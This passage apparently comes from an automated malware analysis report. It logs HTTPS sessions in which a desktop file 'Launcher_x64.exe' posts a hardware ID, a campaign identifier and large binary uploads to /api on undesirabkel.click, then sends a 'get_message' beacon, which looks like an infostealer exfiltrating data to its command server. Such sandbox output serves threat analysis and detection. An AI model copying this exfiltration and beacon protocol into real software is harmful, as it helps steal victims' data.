2024-12-31 16:37:17 UTC	1138	IN	HTTP/1.1 200 OK Date: Tue, 31 Dec 2024 16:37:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=grudnqjfstf1vuqilno7gognj5; expires=Sat, 26 Apr 2025 10:23:56 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BnH6m5H%2FUrtzaG8sifbjJ2oEtPPABvp7NfAloCAp6qZoSsocYaJN%2B5atJB3sOG2I%2BFeUL%2FYm4MfVij4u6YiiexFcMK6P3UvR9CVoVUE1tkxm39tdTs%2BR%2FBAW2H22NRBTBRgmt1I%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fabb17dbf3e4303-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1625&min_rtt=1611&rtt_var=632&sent=10&recv=14&lost=0&retrans=0&sent_bytes=2845&recv_bytes=9739&delivery_rate=1692753&cwnd=219&unsent_bytes=0&cid=9df80dff9779af72&ts=775&x=0"
2024-12-31 16:37:17 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-31 16:37:17 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49734	188.114.97.3	443	7372	C:\Users\user\Desktop\Launcher_x64.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-31 16:37:18 UTC	277	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=D1YXNTJVU2N User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20402 Host: undesirabkel.click
2024-12-31 16:37:18 UTC	15331	OUT	Data Raw: 2d 2d 44 31 59 58 4e 54 4a 56 55 32 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 44 39 32 34 39 30 43 35 36 41 46 45 30 31 37 39 32 41 34 36 37 46 36 31 35 46 30 37 34 43 37 0d 0a 2d 2d 44 31 59 58 4e 54 4a 56 55 32 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 44 31 59 58 4e 54 4a 56 55 32 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 73 77 65 74 61 6d 75 62 63 6f 79 75 0d 0a 2d 2d 44 31 59 58 4e 54 4a 56 55 32 Data Ascii: --D1YXNTJVU2NContent-Disposition: form-data; name="hwid"5D92490C56AFE01792A467F615F074C7--D1YXNTJVU2NContent-Disposition: form-data; name="pid"3--D1YXNTJVU2NContent-Disposition: form-data; name="lid"LPnhqo--swetamubcoyu--D1YXNTJVU2
2024-12-31 16:37:18 UTC	5071	OUT	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: lrQMn 64F6(X&7~`aO
2024-12-31 16:37:21 UTC	1138	IN	HTTP/1.1 200 OK Date: Tue, 31 Dec 2024 16:37:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=kln36a1nga9q93f05duvvbe4lr; expires=Sat, 26 Apr 2025 10:23:57 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=t%2BxWIg2eQyn0RRSaZMqqm1uc%2FAtzhQ2b8wKvZikK94%2FZ%2FCryEamC5mVyTiqwCFJYg70Cn3OiLi1oBryTAEGcWbrmKIi%2BwEkgV6ezIpe9lCiw6xLv2ylG2v%2FvevDaQJFCvwJwbeQ%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fabb1864bc30f81-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1488&min_rtt=1486&rtt_var=562&sent=12&recv=25&lost=0&retrans=0&sent_bytes=2846&recv_bytes=21359&delivery_rate=1936339&cwnd=239&unsent_bytes=0&cid=88a9413187186505&ts=3434&x=0"
2024-12-31 16:37:21 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-31 16:37:21 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49735	188.114.97.3	443	7372	C:\Users\user\Desktop\Launcher_x64.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-31 16:37:22 UTC	284	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=0OT5R9Y34Z1ZACQ1LYY User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1270 Host: undesirabkel.click
2024-12-31 16:37:22 UTC	1270	OUT	Data Raw: 2d 2d 30 4f 54 35 52 39 59 33 34 5a 31 5a 41 43 51 31 4c 59 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 44 39 32 34 39 30 43 35 36 41 46 45 30 31 37 39 32 41 34 36 37 46 36 31 35 46 30 37 34 43 37 0d 0a 2d 2d 30 4f 54 35 52 39 59 33 34 5a 31 5a 41 43 51 31 4c 59 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 30 4f 54 35 52 39 59 33 34 5a 31 5a 41 43 51 31 4c 59 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 73 77 Data Ascii: --0OT5R9Y34Z1ZACQ1LYYContent-Disposition: form-data; name="hwid"5D92490C56AFE01792A467F615F074C7--0OT5R9Y34Z1ZACQ1LYYContent-Disposition: form-data; name="pid"1--0OT5R9Y34Z1ZACQ1LYYContent-Disposition: form-data; name="lid"LPnhqo--sw
2024-12-31 16:37:25 UTC	1127	IN	HTTP/1.1 200 OK Date: Tue, 31 Dec 2024 16:37:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=35rr2oelre115adm8vcsbail14; expires=Sat, 26 Apr 2025 10:24:04 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ILikjVTxfDvgPIVSCjln5OJlN1PBLgay9SMdAm1NEXndYfDWCAjaIIwyR7e2TkvbFG%2B2Dged1dLdvXYvGZSJdBBkKwWIgAkd7Yj3TLUIlXhBagfecCK5VLHLH2o84q%2Fv4fUmx94%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fabb1a23f740f97-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1665&min_rtt=1645&rtt_var=658&sent=5&recv=9&lost=0&retrans=0&sent_bytes=2845&recv_bytes=2190&delivery_rate=1613259&cwnd=245&unsent_bytes=0&cid=d2f1b1c2198ae3ac&ts=2535&x=0"
2024-12-31 16:37:25 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-31 16:37:25 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49736	188.114.97.3	443	7372	C:\Users\user\Desktop\Launcher_x64.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-31 16:37:26 UTC	276	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=NTCS7LIP3 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 584103 Host: undesirabkel.click
2024-12-31 16:37:26 UTC	15331	OUT	Data Raw: 2d 2d 4e 54 43 53 37 4c 49 50 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 44 39 32 34 39 30 43 35 36 41 46 45 30 31 37 39 32 41 34 36 37 46 36 31 35 46 30 37 34 43 37 0d 0a 2d 2d 4e 54 43 53 37 4c 49 50 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 4e 54 43 53 37 4c 49 50 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 73 77 65 74 61 6d 75 62 63 6f 79 75 0d 0a 2d 2d 4e 54 43 53 37 4c 49 50 33 0d 0a 43 6f 6e 74 65 Data Ascii: --NTCS7LIP3Content-Disposition: form-data; name="hwid"5D92490C56AFE01792A467F615F074C7--NTCS7LIP3Content-Disposition: form-data; name="pid"1--NTCS7LIP3Content-Disposition: form-data; name="lid"LPnhqo--swetamubcoyu--NTCS7LIP3Conte
2024-12-31 16:37:26 UTC	15331	OUT	Data Raw: 77 57 e7 b0 2d 32 2a aa 92 b7 4d 66 b9 39 4d 74 eb 15 35 a9 c4 41 7b 9f d0 c5 2c 55 6c 44 45 fc 71 26 f0 3e 08 95 5d aa 99 29 bd c6 8f 1b 18 dc ca 2b 24 3e 86 bd d4 09 03 25 4a 95 08 fa f3 f4 46 43 6d cc d0 91 b3 93 da e1 7f 7d dc 27 6a 83 b9 dd d2 4f 70 e6 7f 5e 78 70 6a cd 7c 46 a6 ab ea 41 b6 3a 9a 3d ad 6e ca 7e ff 3e 15 a2 ef 30 15 b2 a1 af 9a 77 b0 a9 7a a2 1a 94 24 ed 09 29 bc 3b d3 d2 c5 79 26 bf 02 37 c8 df 03 6d 41 d5 d1 bd 09 a7 39 3b 66 0b 4d c2 dc 0f a5 ec c5 4d 33 86 5c dc 7c 94 bb 56 79 43 78 1b ce e7 af af d7 1c a4 9e 67 a7 cf fb c4 08 03 a0 17 41 b5 46 a5 d0 2c 8b c4 e8 3f c5 bb 57 4f fa 2d 7f 09 cf 01 3d c2 be b7 75 9f 80 9e 6a c0 0e de bd 9e 7c f0 93 eb 6a 4a 59 60 a7 9b 0a df 7d 36 ea 34 db 6c 6e 73 9d 77 92 22 4b a6 c2 5e 4c fe 59 83 Data Ascii: wW-2*Mf9Mt5A{,UlDEq&>])+$>%JFCm}'jOp^xpj\|FA:=n~>0wz$);y&7mA9;fMM3\\|VyCxgAF,?WO-=uj\|jJY`}64lnsw"K^LY
2024-12-31 16:37:26 UTC	15331	OUT	Data Raw: 8f 61 ec 82 7a 4d 4b 72 6f bc a2 d8 28 b0 27 35 bd 6c 84 82 e7 47 e3 38 40 f1 53 31 d8 9f 37 53 da 7d e3 c9 61 82 4a 40 7a 17 53 6e 36 5b c7 d2 b9 ce da 08 25 ea 65 f1 3c 9a 83 41 b0 9b b2 36 94 f7 42 21 9a 3e b4 05 16 3d 0e 99 5d 6c 90 14 d4 75 3b ff 5e e9 82 df be 48 21 b5 d7 a9 34 c2 77 5a 66 06 9c c0 e7 0b 41 27 2f aa fe be c3 56 12 44 32 09 83 e8 26 bb cb 79 9c 2b 62 d8 cc 56 98 5f ec f5 7a 12 c0 37 69 7d 67 b3 fb ab 80 72 4d 25 56 73 cd ab eb 69 a8 9d cb c6 c0 63 58 99 d3 6d 06 dd 3a 8d 98 df cb e3 34 da 0a 51 f7 61 4e 4a 9e 27 75 30 22 bd 78 63 08 cf 23 be f1 88 ba 42 bc 0f 1d 2a c5 d9 e7 19 c0 f1 7b f3 0f 81 f2 7f 91 81 b1 39 5f 1c b5 f7 45 d7 0f 6f 97 de 94 8e 0a f7 9d ba 06 cc 44 64 96 1b 0b 72 2e e6 ba d8 c3 9c ac 8d b0 0e 8e f6 07 8e 69 0c 2b Data Ascii: azMKro('5lG8@S17S}aJ@zSn6[%e<A6B!>=]lu;^H!4wZfA'/VD2&y+bV_z7i}grM%VsicXm:4QaNJ'u0"xc#B*{9_EoDdr.i+
2024-12-31 16:37:26 UTC	15331	OUT	Data Raw: 87 61 ac 8e 34 df df 30 49 34 06 2b 29 17 59 7f f4 0c fa 8f a5 0e cd 3c 0f 5f 81 72 90 c1 17 1d 88 5d 89 db d5 47 ee be 6a be 65 6d fc 88 61 d3 11 e4 01 04 21 e7 9e 73 76 05 8a bf 3b ab 96 06 6b 55 0a 38 a7 07 84 c8 be 9c a3 ec 31 14 08 cf 6e a9 95 c8 b8 fc 5f fc fe b8 73 c3 47 fa c2 97 4f de 17 2c 3a 07 b6 d8 cc 0b 9e af b9 3b 10 40 09 f0 da aa dc 83 ad ee be 60 7f 3e aa 5a 54 bb 54 00 1c 4a 20 b2 21 d7 79 69 13 b7 85 52 f9 6d 22 a5 b2 20 8f 45 f4 ab bb 13 15 2f 9c 52 e1 7b 7b 13 78 ce 97 99 10 4d 01 69 cb 30 b2 9f 1b de 4c a1 6f 44 de e1 9c 84 78 13 e0 91 4b 19 00 f9 9d 20 7e 37 f3 e5 f2 e8 79 82 e8 73 86 81 9e ba e4 7d 48 6d 1d 01 34 03 3c a0 10 17 cb 6a 1b 60 35 79 c1 a7 20 42 ee d3 a2 12 9e f4 94 c2 d3 75 f4 9f ea 5f 98 3b 2b 05 01 d4 e3 5f e7 0d 01 Data Ascii: a40I4+)Y<_r]Gjema!sv;kU81n_sGO,:;@`>ZTTJ !yiRm" E/R{{xMi0LoDxK ~7ys}Hm4<j`5y Bu_;+_
2024-12-31 16:37:26 UTC	15331	OUT	Data Raw: a3 a1 38 27 91 d7 de 3c a1 f0 5a d3 1a 8f 52 53 8a 8a 64 0f 08 d7 f3 e5 8a e0 14 fd 94 0e 72 73 a3 43 1c a1 57 b2 eb a4 95 cf 4b 6b 34 ac 58 52 73 ae a9 c8 6f 37 89 31 68 a8 ab ea 56 42 7d 67 e4 3d 31 8b bd 22 2e 13 7c a8 d6 4a 12 9c b8 d1 78 69 c7 5b 60 ce 71 6f 34 db 11 fa da 0f 9f ef af 9f d9 1c f9 d1 a7 27 c5 96 d7 68 a4 cd b4 ec d7 1e 8d 88 8d 49 63 f0 84 42 f1 f2 ae 5f ee 57 ae 96 a9 00 9a ab ca e0 f4 12 64 56 1d 6e 97 a3 a2 8a 9f 0f 6d 5f 59 f3 1b 6d db b0 ac 68 59 7b bd e9 16 17 59 b7 ae 76 90 27 51 45 65 a0 71 23 de e3 90 48 9a 21 17 b5 0d d8 9b e6 69 86 fe 1c 1d e5 b6 01 2d 08 fe fb 9e 8a c3 24 d3 0a 4e c8 8f 68 d1 e6 bb 83 ab de e9 24 87 bc 5a ae 0c a7 75 8a 27 f1 30 20 5e 20 b6 38 88 22 b4 85 e6 ac 41 7c 85 06 78 e7 2a 34 5a 60 1d 05 2f 35 4c Data Ascii: 8'<ZRSdrsCWKk4XRso71hVB}g=1".\|Jxi[`qo4'hIcB_WdVnm_YmhY{Yv'QEeq#H!i-$Nh$Zu'0 ^ 8"A\|x*4Z`/5L
2024-12-31 16:37:26 UTC	15331	OUT	Data Raw: 55 78 10 71 98 69 d1 ad f2 3a 2d 47 62 53 4c 7a 3a a4 64 0b bb b5 37 65 c4 62 6f e6 0d 7c 59 83 89 cc 04 34 3f 7c 8f 11 b8 e8 2a 1f aa ef dc 5a 63 ec 89 11 39 53 85 c0 79 a9 e4 98 45 f1 d6 90 c7 a9 63 b3 c9 d5 0e 07 bc 26 fa d4 0a d3 0b 44 67 c8 48 f3 49 be ef 45 be 82 7d 31 5e ea 3a d9 bb 94 d5 31 aa 80 17 12 15 65 ae cd a7 16 62 fb fd 33 5d 6c 26 05 0e eb 34 7b fb 6e ed 13 4a 4e d8 9b a7 c3 e5 d3 4b 84 8c 3c 41 f1 a1 91 1d 20 73 e1 1c b3 81 71 e8 b2 47 ac 29 96 35 f5 b1 e0 53 65 17 e4 96 12 26 80 1c 61 47 fc 8a 7f 42 a4 11 b0 8b b9 3c 53 03 d3 40 8d 4a d8 e4 f4 4c 4e 33 0e ec 57 6b b7 87 1f 83 19 c5 ea ff 18 25 ad c1 93 ad 57 78 02 f7 02 16 54 e5 7b 91 48 f3 23 a7 2a 67 aa 87 0f bc d2 dd f5 d5 b9 77 ba 35 ad e4 ce 7f 74 88 ee 4a 31 09 07 8b d1 22 1c 47 Data Ascii: Uxqi:-GbSLz:d7ebo\|Y4?\|Zc9SyEc&DgHIE}1^:1eb3]l&4{nJNK<A sqG)5Se&aGB<S@JLN3Wk%WxT{H#gw5tJ1"G
2024-12-31 16:37:26 UTC	15331	OUT	Data Raw: fd 77 ab 8c 4b e7 ba fa ff be 72 b7 f4 5b ed 3f af ee 94 ed 2b 5d 9a d4 dd 4d e0 f6 b6 fe 5d c5 fd 33 bc 87 b0 b1 94 d6 8a 5d 7c a5 0c 7a d2 04 06 29 30 2c 22 60 52 b5 79 5d 14 a4 31 c0 62 dd f8 ef 43 20 1b 05 33 b5 33 b5 70 16 80 90 0d a1 10 08 71 b0 2e 0e e5 bc 1e 50 fb 75 1a c9 0b a5 e0 e4 96 d9 07 7b 0c 10 bc 70 51 fc f0 7e 42 d6 e6 c5 fe f4 8f 1a df 77 8a 98 a2 c3 61 f8 59 d3 e5 e5 ee ee ca 3f 0b 57 45 53 c3 d8 86 39 66 1f 62 58 de de 1b ee 2f 1e 41 a4 0c 2f fa 21 30 6b ed 2d 0c 44 04 b1 2d 92 db cd 11 79 cb eb 25 8f 9a 6f 5f 16 d5 c4 f3 52 6c ff d1 a5 87 17 3c f1 6d ff c0 ab f2 50 97 1c 2c 0f dd 29 05 41 18 f8 10 06 ff 6e 17 5e 00 f1 67 2a 3d 5b d0 66 ac ca 8f 8f 7e fc ed 78 ba 00 b8 f4 83 1d fb 03 14 b6 10 6b 2a 93 82 70 36 d6 93 9c 5b 33 b9 3c b5 Data Ascii: wKr[?+]M]3]\|z)0,"`Ry]1bC 33pq.Pu{pQ~BwaY?WES9fbX/A/!0k-D-y%o_Rl<mP,)An^g=[f~xkp6[3<
2024-12-31 16:37:26 UTC	15331	OUT	Data Raw: 3f 3b 19 c4 0d 31 c2 8c 58 05 f1 9b 93 fc 60 84 6f 95 74 67 e2 e8 46 5f 46 ce 7f ae e5 77 19 c1 c5 ac 9b 77 0d e6 22 e6 95 ee 70 73 04 07 0b be ec 4e fb 61 72 df 6e c3 7b b1 b4 2d 4d 29 a5 35 b4 a6 c2 e5 d2 a5 cd 4d 36 8b 73 3f de 8c a3 cf 38 3a b7 6c 11 38 21 05 f7 5a 48 74 03 6a 8c c4 ff 82 c7 6c 70 39 f3 31 81 65 39 72 24 92 33 5b 3e e1 ea 32 38 53 be dc bd c2 41 2a 2a 86 94 b1 59 28 2d 2c 6d 32 e5 a9 7f c9 82 12 6e 4d 53 20 06 63 c9 47 e2 b3 2c 6d 22 48 12 b2 7e 11 ce 0d 20 f5 2a b6 76 58 54 b8 ff 5e 50 68 ad a4 1c 21 24 16 7d 63 c4 11 64 34 37 38 e7 80 cd d0 08 b4 eb 5a 2d cc fb 92 71 09 8b 8f 7f ff 58 10 1e 16 84 fe a4 d1 dd 83 3f 0b 31 56 fd 67 b6 26 fc 4f 55 f1 05 9f e9 09 68 ba f5 2d 6d e4 bf 2f 13 1b 9a ad 07 86 b8 23 c7 5e 81 c5 b1 11 86 cc c2 Data Ascii: ?;1X`otgF_Fww"psNarn{-M)5M6s?8:l8!ZHtjlp91e9r$3[>28SA*Y(-,m2nMS cG,m"H~ vXT^Ph!$}cd478Z-qX?1Vg&OUh-m/#^
2024-12-31 16:37:26 UTC	15331	OUT	Data Raw: ea 8c ae 5e 74 4b 0c c2 74 05 7d ad 61 82 95 dd 33 36 f5 f6 6d eb 8e a7 7e fd a9 ab fd 7b 5b 90 5d fe 02 8f 28 3a f2 66 42 c8 bb 11 94 d7 a5 d1 49 cb 37 c2 e0 24 b4 57 6b da e8 b3 ea 14 a1 80 85 6f 19 94 99 85 5d 98 1a 27 f2 4d d4 2e d4 b7 55 9a 1c 61 d9 9f 7a 0d 78 fd 48 d8 1f c1 cf 31 40 37 17 5a 46 31 38 65 79 68 17 be fc 04 35 8f 8d 81 7c 2a 91 4d 8a ae ba 8b b6 a3 67 1b 01 1c 56 6a 1b 29 b6 3b 65 17 4f b5 55 70 b4 04 6b 80 85 7e ad bf 78 e5 b2 9f 76 74 dd ed 21 32 2c df 00 61 f0 78 21 c5 cb 6f 55 94 ef 35 d8 eb ce ec 5a 7b a1 2a f4 d8 58 e7 7e 54 fa 05 d6 11 a4 ea ac 06 3e 75 dd 36 6f e3 99 1f de a6 9b 1f a7 7a 3e 8f a5 78 f8 bd 2b a0 65 e0 0c 16 c7 47 36 4e f0 5b 7f 0c a3 75 49 98 7c ff 26 d6 ca ee 8c 26 94 f1 f9 ac eb eb f1 08 93 a6 68 e6 a3 e6 5c Data Ascii: ^tKt}a36m~{[](:fBI7$Wko]'M.UazxH1@7ZF18eyh5\|MgVj);eOUpk~xvt!2,ax!oU5Z{X~T>u6oz>x+eG6N[uI\|&&h\
2024-12-31 16:37:26 UTC	15331	OUT	Data Raw: ef 74 8a 3a 54 f5 8d 5c 02 59 56 ca 60 66 eb 8c a1 8d ea 29 32 32 cd a1 8d 8a 1a e5 b9 66 c2 9c 56 37 ed fc b3 df fa 92 50 6d 12 c5 69 32 82 52 86 79 25 e2 90 77 99 5c 1b 26 0b 6d 91 f9 54 29 04 44 ec 8a 02 09 47 59 9c 75 ff 31 22 bb 2f a6 3d b4 14 d7 5c 17 90 ff 8a 81 ce d9 a5 58 fe ef 38 29 fb a3 d2 da 37 39 da b7 e5 d3 03 6c 11 e5 08 06 79 fe d7 45 5c 61 b2 15 b3 c6 bb 1f a5 ba a7 3f a4 48 ba 4f 77 6a 99 e5 50 97 15 69 5f fb 4e a5 9c c0 fa 91 99 52 5a 74 9e d8 f4 ad bc 5b 39 ac d0 4f 5b b2 ff 9d 30 73 62 7e 3b 20 39 c5 86 e2 be 5a 9c 0a 1f f8 d7 cb 60 cf f2 87 ba d9 17 b3 91 ef a5 1b bd c2 5f 2e 56 eb cd b8 2b cf 5a fe 83 3e fb 0f da 35 42 6a b6 5a b4 63 ed 1b ab 6f a6 34 ed 63 5f c0 13 e9 c2 bc e9 98 63 b7 4e ba 04 ed 75 3b af 68 25 d0 01 6e da 65 68 Data Ascii: t:T\YV`f)22fV7Pmi2Ry%w\&mT)DGYu1"/=\X8)79lyE\a?HOwjPi_NRZt[9O[0sb~; 9Z`_.V+Z>5BjZco4c_cNu;h%neh
2024-12-31 16:37:28 UTC	1139	IN	HTTP/1.1 200 OK Date: Tue, 31 Dec 2024 16:37:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=m000lar6g8d5qpo6aocb5dr25r; expires=Sat, 26 Apr 2025 10:24:06 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bR%2BY3TyiTaS0%2BMPu2yyb%2BoH3FwL5oAl925%2BFTulJdLAWhOR6ADHuzfRdVoy4n0Qz1OdBEHFFdMF0cY1Bo3YVWbSjhHB8mQUkcAc%2FsLYQGUECpWFc419wGa5yPDyzeMT3YIUsEdc%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fabb1b8180ede95-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1500&min_rtt=1493&rtt_var=574&sent=217&recv=602&lost=0&retrans=0&sent_bytes=2846&recv_bytes=586687&delivery_rate=1882656&cwnd=240&unsent_bytes=0&cid=20bb10a0b4cb5b88&ts=2277&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49742	188.114.97.3	443	7372	C:\Users\user\Desktop\Launcher_x64.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-31 16:37:29 UTC	266	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 89 Host: undesirabkel.click
2024-12-31 16:37:29 UTC	89	OUT	Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 50 6e 68 71 6f 2d 2d 73 77 65 74 61 6d 75 62 63 6f 79 75 26 6a 3d 26 68 77 69 64 3d 35 44 39 32 34 39 30 43 35 36 41 46 45 30 31 37 39 32 41 34 36 37 46 36 31 35 46 30 37 34 43 37 Data Ascii: act=get_message&ver=4.0&lid=LPnhqo--swetamubcoyu&j=&hwid=5D92490C56AFE01792A467F615F074C7
2024-12-31 16:37:29 UTC	1131	IN	HTTP/1.1 200 OK Date: Tue, 31 Dec 2024 16:37:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=i1em279hkas6i2af2i3h5ruhs5; expires=Sat, 26 Apr 2025 10:24:08 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: 